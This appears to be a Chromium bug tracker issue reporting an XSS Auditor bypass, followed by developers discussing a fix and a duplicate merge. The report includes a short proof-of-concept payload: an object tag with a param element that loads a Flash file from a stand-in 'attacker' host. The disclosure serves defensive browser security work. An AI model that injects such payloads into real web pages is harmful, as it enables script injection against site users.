New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Starred by 2 users

Issue metadata

Status: Duplicate
Merged: issue 783618
Closed: Nov 10
EstimatedDays: ----
NextAction: ----
OS: Linux , Android , Windows , Chrome , Mac
Pri: 3
Type: Bug

Show other hotlists

Hotlists containing this issue:

Sign in to add a comment

XSS Auditor bypass using object tag and url parameter

Reported by, Dec 26 2016 Back to list

Issue description

I'd like to report an XSS Auditor bypass bug.
PoC is here:

<object allowscriptaccess="always">
<param name="url" value="https://attacker/xss.swf">

Could you confirm this bug?

Version 57.0.2962.0 (Official Build) canary (64 bit)
It seems it works via the name="code" also.

<object allowscriptaccess="always">
<param name="code" value="https://attacker/xss.swf">
Components: Blink>SecurityFeature
Labels: -Type-Bug-Security -Restrict-View-SecurityTeam Type-Bug
Status: Assigned
Thanks for the report. Tom, could you take a look when you get a chance?
Status: Started
Looks like there are few more <param> cases to cover.  Thanks for the report.
I'm also going to filter the allowscriptaccess attribute in <object>, just because, even though there's enough malice that can be accomplished even without it. is where we decide which name=xxx parameters are candiates for sanitization. has its own ideas about URL parameters. 

Mike, should we unify the two?  Have a suggestion about who else might weigh in on param element behaviour?
Mike: |allowscriptaccessAttr| token doesn't exist, can we add this to whatever IDL generates these?
Bouncing to mike to get some answers.  Pls re-assign to me afterwards.

Comment 9 by, Feb 23 2017

Labels: xssauditor

Comment 10 by, Feb 24 2017

Labels: OS-Android OS-Chrome OS-Linux OS-Mac OS-Windows Pri-3
I missed this, apologies:

1.  I don't think we handle `allowscriptaccess` in Blink today; we just hand all the params over to the plugin and let it figure out what it ought to be doing with them. Feel free to add it to `Source/core/html/HTMLAttributeNames.json5`.

2.  I think unifying the URL parameter behavior makes sense. Do you have a concrete suggestion for doing so?
Labels: Hotlist-EnamelAndFriendsFixIt
Mergedinto: 783618
Status: Duplicate
Oddly enough, this came in again recently.  Doing the uncool thing of duping the old into the new, because that's where the work is happening.

Sign in to add a comment